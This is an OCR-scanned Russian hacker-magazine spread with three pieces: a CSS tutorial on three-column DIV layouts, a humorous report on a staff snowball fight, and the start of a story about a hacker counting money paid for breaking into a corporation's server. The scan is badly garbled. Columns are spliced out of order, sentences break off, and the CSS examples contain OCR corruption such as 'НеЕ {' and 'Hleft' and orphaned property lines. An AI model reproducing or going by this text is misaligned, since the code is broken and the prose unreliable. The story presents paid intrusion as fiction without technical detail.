Как создать простейший С55-блок нужной 
нам ширины? Для этого сначала придется 
написать код его свойств и вставить в 
страницу либо в файл со стилями (это тот, 
который оканчивается Ha .с$$): 

<STYLE TYPE=«text/css»> 

#css-block { 

width: 40px} 

</STYLE> 


На большинстве сайтов используется 
трехколоночная верстка: первая, узкая, 
колонка - навигация по сайту, вторая, 
самая широкая - текст (новости и прочая 
информация), третья, узкая - разная 
мелочь, реклама, голосования и тому 
подобное. Таким образом, мы можем 
сделать три колонки блоками, ведь 
распределять их ширину можно не только 
пикселями, но и процентами. Следующий 
код делает именно такую страницу: 


<STYLE TYPE=«text/css»> 
НеЕ { 


Наружные поля (margins) в нашем случае 
не обязательны, но ты можешь иметь в 
виду, что следующий стиль: 


#xak { 
margin: 10px} 


Чтобы текст одного блока не прилипал к 
тексту другого, следует выставить все 
необходимые отступы. Сделаем 
внутренние отступы, скажем, в 5 пикселей 
(имей в виду, тогда расстояние 
содержимого соседних колонок составит 
5+5=10 пикселей). Это делается так: 


<STYLE TYPE=«text/css»> 
Hleft { 

padding: 5px; 

width: 25%; 

position: absolute } 
</STYLE> 


Либо, если это изменение применимо для 
всех контейнеров на паге, чтобы не 
париться и не увеличивать объем кода, это 
свойство можно вписать в стиль тега 


<DIV>, который необходим для объявления 


любого блока: 


<STYLE TYPE=«text/css»> 
DIV { 

padding: 5px } 

</STYLE> 
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может содержать как текст, так и 
изображение, и вообще любые данные. 
Также он может вкладываться в другой 
блок (вложенность неограниченна). 
Таблицы в случаях глубокой вложенности 


Заметь, перед именем «css-block» стоит 
значок «#» - это значок ID. По правилам 
это значит, что блок такого типа будет 
единственным на странице. Если же ты 
хочешь усыпать все поле юзерского 
браузера такими блоками, правильнее 
будет поставить не «#», а точку, вот так: 


.css-block. В таком случае это будет класс. 


width: 25%; 
position: absolute } 


#center { 

width: 50%; 
position: absolute; 
left: 25% } 


#right { 

width: 25%; 
position: absolute; 
left: 75% } 
</STYLE> 


создаст вокруг блока «xak» поля шириной 
в 10 пикселей. 

В обычных случаях все содержимое 
страницы имеет некоторый отступ от края 
браузера (сверху и слева). Однако это 
предусмотрено в основном только для 


Трехколоночный дизигн а’ля натюрель. 


начинают жестоко тормозить браузер, в то 
время как С55-блоки обрабатываются 
довольно быстро. 


Теперь в любое место страницы вставляем 
непосредственно блок. Делается это 
тегами <DIV>: 


<DIV ID=«css-block»> 

Этот драный блок имеет ширину 40 
пикселей 

</DIV> 


<div id=«left»> 
Навигация 

</div> 

<div id=«center»> 
Новости 

</div> 

<div id=«right»> 
Реклама и мелочь 
</div> 


Здесь мы абсолютно позиционируем наши 
элементы, поэтому в блоках «center» и 
«right» делаем отступ слева 25 и 75 
процентов соответственно. 


текста. Чтобы убрать эти отступы, надо 
подредактировать тег <body>: 


<body leftmargin=«0» topmargin=«0»>. 


Выравнивание текста внутри блоков 
можно также вписать в стиль Tera <DIV>, 
так как обычно выравнивание одинаково 
по всей странице. По умолчанию текст 
равняется по левой стороне, в примере 


Если возникла необходимость взять какой- 
нибудь блок в рамку, смотри сюда: 


<STYLE TYPE=«text/css»> 
#vramke { 
width: 40px; 


Мы можем позаботиться и о заднем фоне 
любого отдельно взятого блока. Для этого 
нам предоставляется целый набор 
средств. Например: 


<STYLE TYPE=«text/css»> 

#bgrulez { 

width: 40px; 

background-color: #333; 
background-image: url(img/fon.gif); 
background-repeat: no-repeat } 
</STYLE> 


Итак, у данного блока цвет бакграунда 
будет #333, фоновая картинка - fon.gif из 
папки img, фоновая картинка не будет 
размножаться по осям (no-repeat). Кроме 
no-repeat, свойство background-repeat 
принимает значения repeat (картинка 
размножается по обеим осям), repeat-x 
(по горизонтали), repeat-y (по 
вертикали). Очень полезно, если хочется 
намутить, например, полосатый задник - 
достаточно всего одной полосочки. 


Слабое место рассмотренной верстки 
блоками CSS - трудное регулирование 
высоты, особенно это может повредить 
дизайну при разных заданных цветах 
блоков-колонок. Эту проблему можно 


Если ты хочешь больше узнать о верстке с 
помощью CSS и вообще накачаться инфой 
о каскадных листах стилей, смело 
рекомендую книгу Михаила Дубакова 
«Веб-мастеринг средствами CSS» 
издательства BHV. Этот белорусский веб- 


Если ты настоящий графический дизайнер, 
то при подготовке страницы сначала 
юзаешь графический редактор (CorelDraw, 
Photoshop), лабаешь в них макет, а уже 
потом его реализуешь подручными 
средствами верстки HTML. Одной из 
проблем такого подхода является то, что 
цвет, заданный в редакторе 
шестнадцатеричным числом, иногда при 
экспорте в gif или jpg оказывается 


несколько иным :(, и при верстке страницы 


приходится ориентироваться на него. Есть 
неплохая маленькая утилита для 
определения шестнадцатеричного 
значения цвета на экране - «Web Designers 
Tool Set» (WTS), ее можно найти по адресу 
www.slhi.com.ru. Кроме цвета, с ее 
помощью можно точно измерять 
расстояния между объектами, что тоже не 


ниже это свойство меняется на 
выравнивание по ширине (текст 
растягивается на ширину блока): 


<STYLE TYPE=«text/css»> 


border-width: 5px; 
border-color: yellow; 
border-style: ridge} 
</STYLE> 


TIPS OF WEB 


DIV { 
text-align: justify } 
</STYLE> 


Это стиль блока шириной в 40 пикселей, с 
выпуклой трехмерной рамкой желтого 
цвета толщиной в 5 пикселей. Кроме 
значения ridge, есть еще стили solid, dou- 
ble, groove, inset и outset. 


Viet ore lia giganto! Ба reer Bea БЫ РТ 


Упакуем левый блок в рамку. 


попробовать обойти, установив 
достаточную одинаковую высоту для всех 
колонок, скажем, 70%. 


мастер, действительно, может немало 
поведать о своем нелегком искусстве; 
кроме того, альтернативы у этой книги, в 


английском языке есть неплохие 
тематические ресурсы - например, сайт 
Джеффри Зелдмана, ярого поборника CSS - 


отличие от «верстки с помощью таблиц» :), Wwww.alistapart.com. 


можно сказать, пока что нет. В инете 
подобной инфы также мало, хотя на 


самая маловажная деталь 
сайтопроизводственного процесса. 
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SC Me. 


команда Спеца против 
команды читателей!!! 


Константин Руденский 


Превью: БСМ2 


В наше время устраивать массовые 
побоища с использованием пейнтбола, 
страйкбола, и прочих пафосных заме- 
нителей мужских пенисов очень мод- 
но. Разнообразные реализаторы муж- 
ских комплексов сейчас нарасхват. А 
мы говорим, что эти самые реализато- 
ры не есть круто — надо играть в снеж- 
ки! Это гораздо более жестоко и 
Гип'ово, а главное, дешево и сердито. 
Замиутить сноубольное мясо можно да- 
же на ходц. Так появились БСМ - Боль- 
шие Снежковые Маневры. 


Дело было в прошлом году, когда за окном валялись огромные суг- 
робы, а натруженные пальцы были готовы пробить насквозь задол- 
банную клаву. Ноа, Донор и Мэд разбазарились по аське про безба- 
шенное прошлое, снег и веселье и решили, что Контра - не единст- 
венное массовое порывалово, от которого прет не по детски. Нача- 
лись терки, типа «да я в ваши годы. ..», «да меня весь двор боялся!», 
«да я вас, как чешек ламоботных!» и так далее. В общем, решили на- 
бить друг другу задницы снегом по всем правилам, с большой тусой, 
крепостями, снеговиками и зарытыми в снег врагами. 

Происходило все это на живописном индустриальном берегу Москвы 
реки прямо в черте города. «Ох, и жаркое то было дело!» - можно ска- 
зать тоном бывалого моряка-спецназовца. Несколько часов СПЕЦ-ре- 
дакторы и СПЕЦ-авторы, перекованные в бойцов ледяного фронта, 
сражались не на жизнь, а на смерть, поражая все самые уязвимые ча- 
сти тела (уши, носы и рты), и рвали на куски бесценных вражеских 
снеговиков, в которых был вложен весь креатив и вся любовь к снеж- 
ным бабам (и даже крепостные валы не могли их удержать). 

Если ты когда-нибудь играл в настольные ролевые игры, в компью- 
терные 3D-3KWHbI, в зарницу, дочки-матери на деньги, в русскую ру- 
летку, то знай - все, что происходит на Больших Снежковых Манев- 
рах адреналинит кровь гораздо круче. 

Ну а теперь суперполезная инфа для тебя. 


се которой, участникам надо быстро и грамотно построить крепост- 
ную стену, хитро сваять и разместить снежную женщину, обеспечить 
подвоз оружейного снега и сварганить пару... десятков ураганных 
атак на бабу противника. И все это под градом тяжеленных мокрых 
снежков и боевых кличей, типа «идите сюда, трусливые шакалы!», с 
другой стороны. 


Основные технические характеристики: 

- 249 видов попаданий по всему телу; 

- 312 вариантов атаки морковкой; 

- 285 способов стрельбы из положения лежа; 

17 основных брыков ногами; 

графика и геймплей вдесятеро лучше, чем в DOOM IIT; 
слаженность команды критичнее, чем в Counter-Strike; 
эффект полного присутствия снега за шиворотом; 


- трехмерные синяки; 

- эффект сглаживания ушей и носа; 

- и, наконец, встроенная игра «Вылепи себе тетку и воткни в нее 
морковку». 


в \ | СЕД СН Я ie Л) i 

a oe hee = 

SPEZ-CREW, естественно, не перло от простых снежков, типа, «шут- 
ем-всем-в-табло-без-разбору». Чтобы игра была азартнее, решили 
кепчить зи флаг. 

Участники поделились на две команды, распределили роли (аттаке- 
ры, снайперы, берсеркеры, защитники баб) и действовали стратеж- 
но: кто-то с тылов обходил, кто-то пер напролом, кто-то отстреливал 
все, что движется, кто-то вытаптывал вражеский снег. Основная за- 
дача была поразить снежную тетку в морковку или вообще отстре- 
лить ей голову. Это не так-то просто, потому что вырвать морковь ру- 
ками — неинтересно, а вот выбить ее метким снежком — это высший 
пилотаж, и достойно респекта. 

У перцев сразу начал работать (о, чудо!) не только спинной, но и ос- 
новной мозг. Чего только не выделывали СПЕЦ-чуваки: кидали сра- 
зу тучу снежков, прорывались к крепости с огромными комками, ис- 
пользовали отвлекающие маневры. Естественно без читов не обо- 
шлось: уж и на бабу ложились, чтобы прикрыть ее своей задницей, и 
ложные морковки ставили, но не помогало. Читерз маст дай! 

А какое тактическое разнообразие снеговиков: восьминогие, много- 
членные карлики; рогатые, пятигрудые гиганты; толстопопые гидро- 
цефалы — в общем, вся сила извращенного креатива SPEZ-CREW. 

Но это все, естественно, не означает, что нужно гамать так и только 
так. Наоборот, в следующий раз СПЕЦ-перцы и тетки решили заба- 
цать еще более безбашенную концепцию. 


Первые БСМ подкинули много интересного опыта. Делюсь бесплат- 
но. Цени! 

Во-первых, оказалось, что БСМ довольно опасная гама, поэтому щел- 
кать нижней губой не рекомендуется. Раздавая ценные указания со- 
ратникам и издавая боевой клич, нужно учитывать, что в широко от- 
рытую пасть может влететь меткий снежок (рот-шот), а то и комок. 
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He стоит пренебрегать толстой вязаной шапкой (броня не бывает 
лишней), так как ухо-шот — явление тоже не редкое, а синяки полу- 
чаются довольно большими и болезненными. 

Во-вторых, грамотный менеджмент команды очень сильно влияет на 
исход битвы. БСМ сразу проявляют личные качества игроков. Вы- 
носливые и юркие перцы прекрасно идут в лобовую атаку, тяжелые 
лоси отлично защищают родных баб, а самые хитрые и незаметные 
пробираются в тыл и устраивают диверсии. Нельзя также забывать 
про снабжение. Всех нужно расставить по местам, иначе в самый от- 
ветственный момент задница снежной женщины останется без при- 
крытия (так всегда и получалось), а атака может захлебнуться из-за 
своей малочисленности. 

В-третьих, нельзя халявить при строительстве крепости, возведении 
бабы, укреплении тыла и набивании складов боеприпасами. Чем 
халтурнее крепость, тем быстрее враг завалит снежную телку. 
В-четвертых, неплохо бы иметь фляжечку с чем-нибудь горяченьким 
(горячительным) для поддержания боевого духа. 

В-пятых, кто-то обязательно должен это все фоткать. Такие кадры 
получаются - закачаешься! 


ГОРА ВПЕЧАТЛЕНИЙ 


(Сейчас, когда впечатления пожухли, и уже охота их обновить, не полу- 
чится передать те ощущения, которые получили СПЕЦ-перцы в полной 
мере, поэтому за нас лучше всего скажут месаги в нашей внутренней 
рассылке, которых сразу после БСМ было рекой. Читай и завидуй! 


Hello Якудзоиды! 

БСМ СОСТОЯЛИСЬ! ПРОГУЛЬЩИКИ ПРПУСТИЛИ СУПЕРРАЗВЛЕКУХУ! 
Поле после нас превратилось во вспаханный полигон, остались раз- 
валины титанических укреплений и снежные монстры. Все мы изва- 
лялись в снегу и даже наелись оного, что по данным Минздрава до- 
вольно вредно, но не суть. МэдДок постоянно жульничал, поэтому я 
все время проигрывал, но после жуткого наезда с моей стороны ха- 
ос пришел в норму, и мы даже поиграли по правилам ;). Сорри, кого 
обидел! Классные фотки, куча впечатлений! 

Питерцы и Киевляне, ждем отчетов от вас! 


З.Ы. Гриф, мы тебя ждали, ждали, даже оставили трех разведчиков в 
метро! Где ты был?! 
ЗЫЗЫ Оригинальная расшифровка БСМ - бондаж садо-мазо :) Где 
так и было... :))) 

Mr.Donor 


Да никто не жульничал! 

просто ваше племя трусливых шакалов не могло даже нормально 
атаковать наших храбрых воинов! Стояли все, понимаешь, в 10 мет- 
pax от наших укреплений и лениво покидывались снежками... бес- 
препятственно пропуская наших отважных бойцов прямо в центр 
своих позиций. 

Но это все не суть - главное, что оттянулись действительно по пол- 


Сумасшедший Доктор 


Что хочется сказать по поводу Маневров? Кто там не был и не имел 
возможности побывать и поучаствовать по роковому стечению об- 
стоятельств - того по-человечески жалко. Кто знал и либо по лени, 
либо по раздолбайству великому забил болт на главное событие но- 


вого тысячелетия - тому стоит глянуть на фотки и умереть от горя. А 
у тех, кто находился за сотни и тысячи километров от поля битвы хо- 
чу спросить: "У вас, что, снега нет?" Я лично так не оттягивался дав- 
но. "Центр и регионы - даешь команду супер-снегометов!!!" Вызо- 
вем на дуэль Мелкософтовцев и устроим им formatFACE.exe. 
Соловей 


Изложу и я свое отчасти противоречивое мнение о Больших 
Снежковых Маневрах. 

Все раздолбаи, оставшиеся дома могут уже и перестать грызть 
локти за свое тупоголовие - не настолько и классно и беззаботно 
все было, как это описывают некоторые участники баталии. Игра 
по правилам в отсутствие судьи порождает многочисленные спо- 
ры о нарушениях правил со стороны игроков вражеской команды. 
Так у нас и получилось. Мэддок, кстати, уже обо всем поведал - До- 
нор играл против правил:)) Раз уж нельзя применять силовые 
приемы, кормить окружающих снегом, ногами пинать оборони- 


тельные сооружения, заходить за очерченный радиус и рукой на- 
TO вытаскивать морковку у нашего Snowman'a, значит - нельзя! 
Донор, скажу я вам по правде, все это делал, за что и подвергся 
кормлению снегом со стороны нашего глубокоуважаемого Мэддо- 
ка, готового героически принять смерть от града летевших в него 
снежков, защищая снеговик и его морковь:)) 

А вообще, правила в нашей игре - это лишнее! Самое веселое - это 
прорваться сквозь оборонительные кордоны соперника, головой 
вперед перелететь через оборонительные снежные стены (или раз- 
ломать их ногами), кинуть снежком в морковь, тем самым выбить ее, 
получить снежком по башке от защитников, завалить кого-либо или 
быть заваленным, и, сломя голову, бежать к своим, параллельно вы- 
плевывая снег, который тебе насильно запихнули в рот! 

Тем не менее, пусть игнорировавшие военно-снежные баталии 
Трусливые Шакалы, оставшиеся дома 25 Ноября, брезгливо пуска- 
ют слюни! Они действительно пропустили море впечатлений и це- 
лую кучу положительных эмоций:)) Когда смотришь на то, как Noah 
на бешеной скорости несется к вражескому снеговику, готовясь 


Превью: БСМ2 


полуметровым снежком снести тому голову, ненароком улыбнется 
каждый! А как провалился заключительный штурм, уготовленный 
нашим стратегом Др. Кодом - четыре человеку с бешеными вопля- 
ми и огромными снежками в руках (полметра в каждом было - это 
точно!) подбегая к вражеской базе и думая о том, как эти горе-сна- 
ряды сотрут с лица земли чужого снеговик, вдруг видят, что снего- 
вик уже давно уничтожен! OT удивления у нас даже собственные 
десятипудовые снежки из рук попадали... 

Andrew. 


Люди! He верьте Эндрю! Все это лажа, и я не знаю, откуда он наблю- 
дал за маневрами (хотя вроде на виду был ;)) 
Собственно этим всем, в чем он обвиняет Донора, постоянно зани- 
мался МэдДок, мы задолбались кидать в него снежками стоя вплот- 
ную к снеговику, так как он нагло заходил в запретную зону. И сне- 
гом кормили в основном вы нас. С вашими лосями справиться - ИМ- 
ХО нереально было. Особенно лосихами - от них урону заграждени- 
ям было гораздо больше :). 
Вранье! Донора снегом не накормили (ну... почти ;)) Док, подтвер- 
ди! Да и не стал бы он его кушать-то - экология... 
Правила в нашей игре - это лишнее?! Ага! Особенно когда по мне 
пробежалась вся ваша команда... До сих пор бока болят... Лоси... 
Что было, то было. ..Добрянский один из этих снежков получил в подарок. 
Co всего размаху... За особые заслуги в планировании боевых операций. 
А так - реально оттянулись. 

Dronich 


Xax, ну вы и зафлудили -). Ящик все не успокоится... 

Я, конечно, разгильдяй, и сильно бесился на маневрах, но делать 
очень жесткие правила все же не стоит... Просто снежки без валя- 
ния в снегу, это не снежки, для меня во всяком случае. Кормление 
снегом, да, чувство не из приятных... Но все равно весело. 
Осталось только дождаться, когда выложат все фоты на сайте или 
кто-нибудь соберет болванки и дружно наштампует, хотя в это с тру- 
дом верится. 


CutteR 


ХОЧЕШЬ К HAM? 


Что, слюни текут по углам и повисают в виде огромных сосулек? Хо- 
чешь к нам? Хочешь узнать, что мы замутим в тот раз? Не вопрос! Про- 
сто сделай несколько простых действий, и ты со своей командой смо- 
жешь навешать SPEZ-CREW, ухо-глазо-носо-рото и прочих хэдшотов. 
Напиши большущее мыло на мыльник spez@real.xakep.ru, в котором 
расскажи, кто ты и откуда, сколько тебе лет, кто твои друганы и подруги, 
которых ты хочешь притащить с собой. Можешь приложить свои фотки, 
чтобы мы тебя точно узнали. Также ждем твои мысли по поводу БСМ. 
Если ты из другого города, то ты просто обязан провести БСМ у себя 
в городе и прислать нам подробнейший отчет. Лучшие БСМ будут за- 
свечены в первом СПЕЦе нового года. 

Короче. Вы все поняли: срочно! нет, СРОЧНО! беги к компу, отсылай 
нам заявки на участие и становись, тем лучшими, с кем мы сможем 
скрестить наши снежки и разделить снежную женщину! 


ar 


Большие Снежковые Маневры II уже ckopo!!!! = 


К ВОПРОСУ О ЧЕСТНОСТИ 


«Кто летал, тем бояться нечего, 
Кто летал, тот с заданьем справился...» 


«Смысловые галлюцинации» - «Звезды 3000» 


Должно быть, сама Мамаша Бейкер так пересчитывала деньги - в темной комнате у маленько- 

го, слабого источника света, настольной лампы или еще какого. Только вот компьютеров тог- 

да не было - и это сильно отличало Loader’a от далекого гангстерского времени, когда по 

всей Америке гремели имена Бонни, Клайда и им подобных. Они просто обязаны были, думал 

Loader, сидеть во мраке, на старых диванах и смотреть, как главарь сильными, не трясущи- 

мися руками, спокойно извлекает из банковских сеток деньги и раскладывает на столе - ря- 

дом с дрожащим огоньком керосиновой лампы. В пятне света видны только руки и пачки купюр, 

совсем недавно принадлежащих добропорядочным гражданам Америки, а в настоящее время пере- 

Тот вид кочевавших в карманы гангстеров. Пальцы заботливо держат в цепких клещах зеленые бумажки, 
деятельности, а глаза четко фиксируют каждую цифру номинала, суммируя все это в голове... 

Loader точно так же сидел сейчас за столом, разложив перед собой несколько пачек мелких 

купюр североамериканской валюты. В комнате было темно, за окном, соответственно, тоже. И 

только экран монитора освещал руки Loader’a и деньги, лежащие перед ним. Десять тысяч дол- 


которым 
занимался Loader, 


подразумевал ларов мелкими купюрами. Десятки отдельно, двадцатки отдельно. 
подобные меры С заказчиком приходилось держать ухо востро: Loader аккуратно - не менее аккуратно, чем 
Безопасности. Мамаша Бейкер - разрывал банковскую упаковку и пересчитывал доллары; в пачках десяток за- 


просто могли оказаться пятерки, а в двадцатках - одно- и двухдолларовые банкноты. Люди, 
чей заказ сегодня был так щедро оплачен, запросто могли кинуть его на приличную сумму - 
В надежде на то, что их пути уже никогда не пересекутся. Пришлось при получении денег по- 


Он был хакером, 
«человеком с 


LS PETE EI верить на слово - слишком уж мало времени было для очного свидания. Теперь xe Loader’a 
глазами» - грыз червь сомнения - не подсунули ли ему «куклу»; он боялся увидеть в пачках сложенные 
Половину вдвое долларовые бумажки, создающие иллюзию полноты суммы. Еще больше он боялся фальшивых 
сознательнай денег - для этого он даже взял напрокат машинку для определения подлинности ценных бумаг 


и сейчас подсвечивал каждую банкноту фиолетовыми лучами. 
Пока все было в порядке. За плечами осталась ровно половина суммы, оговоренной в согла- 
шении. Loader встал, прошелся по комнате, разминая затекшие пальцы, занимавшиеся послед- 
заработав себе ние полчаса однообразной работой, несколько раз присел, выглянул в окно на ночную Моск- 
имя и славц. ву, сиявшую оранжевой иллюминацией, после чего бросил взгляд на оставшиеся пачки денег и 
решительно направился к столу для завершения довольно приятной, но длительной задачи. 
Монитор продолжал ровно светить голубоватым светом. Рутина вновь овладела Loader’om - ку- 
пюру в руки, под фиолетовый свет, на калькуляторе «плюс», отложить в сторону... И так до 
тех пор, пока не закончатся деньги. 
Его мысли порой непроизвольно возвращались к той работе, которая была так щедро сегодня 
оплачена. Loader начинал вспоминать, все ли файлы удалены, все ли логи затерты, нет ли 
в журнале файрволла запросов на соединение с неустановленных адресов, прочно ли закрыт 
электрощит на лестничной клетке... На один из каналов телевизора у него была заведена 
китайская микровидеокамера, воткнутая в глазок; в углу экрана в маленьком прямоуголь- 
ничке он все время поглядывал на пустую площадку перед дверью, опасаясь увидеть там лю- 
дей в форме. 
Тот вид деятельности, которым занимался Loader, подразумевал подобные меры безопасности. 
Он был хакером, «человеком с красными глазами». Половину сознательной жизни он провел за 
монитором, заработав себе имя и славу. Его гонорары выросли; его преступная деятельность 
измерялась годами неполученного срока; его страх порой становился доминирующей эмоцией, 
перевешивая весь экстаз, получаемый от профессионально сделанной работы. Вот и сегодня - 
приличная сумма и замечательно выполненный взлом сервера одной довольно крупной влиятель- 
ной корпорации не очень радовали Loader’a, который то и дело бросал взгляды на монитор, 
несмотря на то, что движения на лестничной клетке не было. 
-...Восемь тысяч двести... Чего-то глаза уже болят... - бубнил себе под Hoc Loader. - И 
еще неизвестно, что легче сломать - винду или Unix... Но этот админ - просто смех какой- 
то! Восемь тысяч четыреста... Надо записать куда-нибудь, а то забуду нафиг... 
Он разговаривал с собой уже около часа. Со стороны могло показаться, что Loader ведет ди- 
anor с компьютером - и, в принципе, это было именно так. Собеседников в жизни у Loader’a 
было не так уж много, круг общения ограничивался несколькими десятками таких же, как он, 
сумасшедших хакеров, сидящих в «аське». Компьютер был самым лучшим, самым честным и на- 
дежным другом - он не предал его ни разу, почти не глючил, старался не зависать, в общем, 
вел себя, как живое существо. За это Loader был очень благодарен своему железному другу, 
вовремя делал апгрейд, не забывал пользоваться утилитами и даже периодически убирал пыль 
изнутри пылесосом. 
Деньги подходили к концу - точнее сказать, завершался их тщательный подсчет и проверка. 
Loader замолчал - говорить с самим собой или с компьютером все-таки время от времени на- 
доедало. У стола выросла горочка разорванных банковских упаковок; рядом остыла нетрону- 
тая, уже остывшая пачка «Доширака». И когда пересчитать осталось около пятисот долларов - 
В ДВЕРЬ ПОСТУЧАЛИ. 
Loader замер, наклонившись над столом. Двадцатидолларовая бумажка зависла на полпути к 
своим сестрам. Несколько раз непроизвольно дернулась щека; Loader медленно перевел глаза 
на экран монитора, ожидая чего угодно... 


жизни он провел 
за монитором, 
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На площадке перед дверью никого не было - по крайней мере, 
именно это и показывала видеокамера. Loader облизнул пере- 
сохшие вмиг губы и приблизил лицо к монитору. Безрезультат- 
но. На лестничной клетке не было никого, от придирчивого 
взгляда камеры укрыться было нельзя. Loader специально об- 
мерял площадку, делая такую довольно дорогую покупку, - угол 
обзора камеры не позволял скрыться от нее даже котенку на 
коврике у соседской, самой дальней двери. 

Медленно встав со стула (Loader даже услышал, как громко 3a- 
скрипели позвоночник и колени), он на цыпочках подошел к 
двери, отодвинул в сторону камеру на подвеске и сам прило- 
жил глаз к линзе. Никого. 

Стук не повторялся. Открывать дверь было, по меньшей мере, 
глупо - когда у тебя на столе лежат десять штук баксов, это 
крайне опасно и необдуманно. Loader вернул камеру на место 
и приложил к двери ухо. С той стороны не доносилось ни зву- 
ка; потом где-то далеко внизу хлопнула входная дверь подъ- 
езда. Этот приглушенный звук заставил Loader’a отшатнуться 
на пару шагов и замереть испуганным зверьком. 

Ситуация накалилась до предела. Краем глаза Loader посмат- 
ривал на деньги, слух обострился, по лицу тек холодный пот; 
губы от него стали солеными. Несколько минут он не двигал- 
ся с места, но потом ватные ноги заставили его вернуться 
тихими маленькими шажками за стол. И только опустившись на- 
зад, он увидел на таскбаре свернутое окошко входящей «ась- 
киной» мессаги. 

Как он не узнал стандартный звук ICQ, осталось за предела- 
ми понимания Loader’a. Но факт остается фактом - в его дверь 
никто не стучал; кто-то «стучался» в его комп. 

Loader закрыл глаза и покачал головой; потом взглянул на 
деньги, встал, прошел на кухню, налил себе рюмку водки и 
выпил ее одним махом, занюхав рукавом. После чего вернулся, 
дождался, когда пульс стал ровнее, и довел до конца финан- 
совую операцию. Все было точно, никакого «кидалова». И толь- 
ко после этого он ткнул «мышой» в пришедшее сообщение. 

- «Wizard просит вашего согласия на создание доверенного 
контакта», - вслух прочитал Loader. - Раньше как-то все про- 


ще было, а с этой «две тысячи третьей» одни проблемы... «Со- 
гласен» - отстучал он в ответ. 

Следующее сообщение пришло практически мгновенно. 

«Привет. Я - Wizard. Будем знакомы?» 

Спирт, преодолев гематоэнцефалический барьер, потихоньку 


просачивался в мозг. Захотелось еще. Loader вернулся на кух- 
ню, налил еще одну рюмку, потом хмыкнул и, взяв бутылку с 
собой, вернулся за комп. Усевшись на место, он выпил еще, 
налил следующую, поставил ее на коврик рядом с «мышой» и 
отстучал: 

«Я - Loader. Чего надо?» 

«Ничего особенного. Экзюпери сказал - «Нет в мире радости 
больше, чем радость человеческого общения». 

«Короче». 

Что во всем этом не нравилось Loader’y - так это то, с Ka- 
кой скоростью приходят ответы на его диал-ап. Будто бы не- 
зримый собеседник сидел в соседней комнате и общался с ним 
по локалке. 

«Вы не читали Экзюпери?» 

«Нет». 
«Жаль». 

«Мне не очень». 

Вопросы об Экзюпери немного развлекли Loader’a. Он усмех- 
нулся им; взгляд перекинулся на наполненную рюмку. 

«Я вас не понимаю». 

«А вот теперь уже мне жаль». 

«Странный вы какой-то... Хотите, я вас развлеку?» 

«Давай». 

После этого пауза была значительной. Loader уже было решил, 
что собеседник слетел с линии, но тут пришла очередная мес- 
сага. 

«У вас на столе лежит 10000 долларов». 

Loader чуть не раздавил «мышку» - так резко он ее сдавил от 
изумления и испуга. Перечитал еще раз. Потом быстро загля- 
нул собеседнику в «Свойства» - там было абсолютно стериль- 
но - ни имени, ни е-майла, ни телефона. Еще бы - делать та- 
кие заявления и оставлять следы - не тут-то было! 

«Ну, как, я вас удивил, развлек?» 


Loader задумался. Можно было, конечно и не отвечать - но 
тогда что делать с этим парнем, который знает о деньгах? 
Продолжение беседы тоже смысла не имеет - от бессмысленно- 
го набора фраз ничего не изменится, он не станет физически 
ближе к этому всезнайке. Выбор небогат. 

«Эй...» - это опять Wizard. 

«Чего?» 

«Они разложены на десять пачек, по 1000 в каждой, а вы си- 
дите за компьютером в одних трусах». 

Это было уже слишком. Loader автоматически протянул руку к 
рюмке и выпил водку, даже не почувствовав ее жгучего при- 
вкуса. Захотелось выключить компьютер, словно это могло ог- 
радить его от незнакомца, пронзающего взглядом стены. Он 
поймал себя на том, что уже протянул руку к кнопке, когда 
пришло очередное сообщение: 

«Мне нет дела до ваших денег. Я просто искал друзей». 
Loader потер глаза, уставшие от контраста между светом и те- 
нью, и перечитал последнее сообщение. «Мне нет дела до ва- 
ших денег»... 

Уцепившись руками в стул, на котором он сидел, Loader су- 
дорожно размышлял уже затуманенными алкоголем мозгами. Что- 
то надо было делать... Он схватил деньги, сунул их в два 
целлофановых пакета, потянулся за брюками... 

«Простите меня за причиненные неудобства. Disconnect». 
Loader упал на non, запутавшись в штанинах. Wizard отклю- 
чился, произведя полное опустошение в душе Loader’a. Потная 
трясущаяся от страха рука хакера продолжала цепко держать 
пакеты с деньгами... 


Двое суток Loader не подходил к компьютеру. При одной толь- 
ко мысли о том, что где-то есть некто, видящий сквозь ди- 
ал-ап, знающий о его темных делишках в Сети, он покрывал- 
ся холодным потом и машинально проверял, на все ли замки 
закрыта дверь. Имея такого противника, сложно было отве- 
тить на вопрос «Как лучше хранить деньги?» - дома, в Сбер- 
банке или в каком-нибудь тайнике. Можно ли с такой кучей 
денег выходить на улицу - да и вообще, можно ли выходить 
на улицу, не рискуя быть схваченным неизвестным (или не- 
известными) ? 

Было довольно грустно сидеть на мешке с деньгами и смот- 
реть, как убывают запасы продуктов в холодильнике, куплен- 
ные несколько дней назад перед началом последней работы 
(Loader так всегда делал, прежде чем предпринять очередную 
атаку - заваливал едой все полки в холодильнике, чтобы как 
можно меньше отвлекаться на поддержание жизненной энергии; 
один раз он от гипогликемии завалился в обморок у компа в 
самый важный момент и с тех пор очень ответственно подхо- 
дил к этому). Вначале закончилось все, что можно было съесть 
быстро, не утруждая себя; потом пришлось взять в руки нож, 
постоять у плиты - но и этому пришел конец. 

Loader тупо смотрел телевизор - бесконечные клипы MTV сме- 
шались в один, глаза уже плохо воспринимали действитель- 
ность; сосало под ложечкой. Время от времени он проваливал- 
ся в дремоту, постанывая от мимолетных сновидений, напол- 
ненных преследованиями и столами, ломящимися едой. Метнув- 
шись в очередном сне от очередного преследователя, он упал 
с дивана, больно ударившись головой о стоящее рядом кресло; 
обхватив руками затрещавший череп, он сел на полу и, рас- 
качиваясь из стороны в сторону, завыл от обиды. 

- Я ведь здесь сдохну с этими бабками! - голосил он среди 
пустой квартиры, поглядывая на шкаф, в котором лежали сей- 
час пакеты с деньгами. - Надо что-то делать, надо что-то 
делать, надо что... 

И в эту секунду в системнике зашумел вентилятор. Следом за 
этим звуком раздался другой, не менее знакомый - зажурчал 
винчестер, подмигивая красным глазком из-под стола. 

Loader прекратил раскачиваться и застыл, спиной чувствуя это 
красное подмигивание. В горле застрял ком слюны, не желаю- 
щий проваливаться в желудок; еще секунда, и он был готов 
вырваться изо рта обратно. Чрезмерным усилием Loader заста- 
вил себя проглотить ставшую вязкой и чуть ли не шершавой 
слюну, после чего повернул голову; и, уже завершая этот по- 
ворот, услышал, как коротко бибикнул БИОС, после чего ком- 
нату осветил монитор. 

КОМПЬЮТЕР ВКЛЮЧИЛСЯ. Включился без всякого вмешательства 
извне, хотя должен был сам уметь выполнять только обратное 
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действие - выключаться, да и то по желанию хозяина. Loader, продолжая сидеть на полу, уви- 
дел, как на экране вылез белый прямоугольничек «Enter Password» (он ставил пароль за за- 
